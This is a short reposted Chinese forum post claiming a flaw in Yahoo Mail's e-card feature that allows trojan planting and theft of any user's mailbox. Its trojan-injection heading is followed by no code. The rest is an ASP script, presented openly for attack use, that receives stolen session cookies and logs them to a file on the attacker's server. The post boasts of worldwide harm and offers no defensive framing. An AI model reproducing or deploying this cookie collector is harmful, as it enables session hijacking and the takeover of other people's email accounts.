雅虎邮箱蕴藏的全球风暴[转]

雅虎邮箱蕴藏的全球风暴[转]

雅虎邮箱号称全球邮箱第一品牌，姑且不论是不是真的，但可以看出雅虎对邮箱业务是非常重视的。CJ也疯狂 非零解北极宫爵他们发现雅虎邮箱的安全漏洞，利用该漏洞可以向雅虎全球邮箱用户发动木马攻击，还可以盗取雅虎任意用户的邮箱，进行社会工程学，该漏洞的危害是全球级别的。

问题出在邮箱贺卡中，挂马代码：

盗邮箱cookie的代码：

<%

dim getcookie

dim ttime

dim str

getcookie=request("cookie")

ttime=now()

set fs=server.CreateObject("Scripting.FileSystemObject")

set file=fs.OpenTextFile(server.MapPath("cookie.txt"),8,True)

str=ttime & "---" & getcookie

file.writeline(str)

file.close

set file=nothing

set fs=nothing

response.write ""

response.end

%>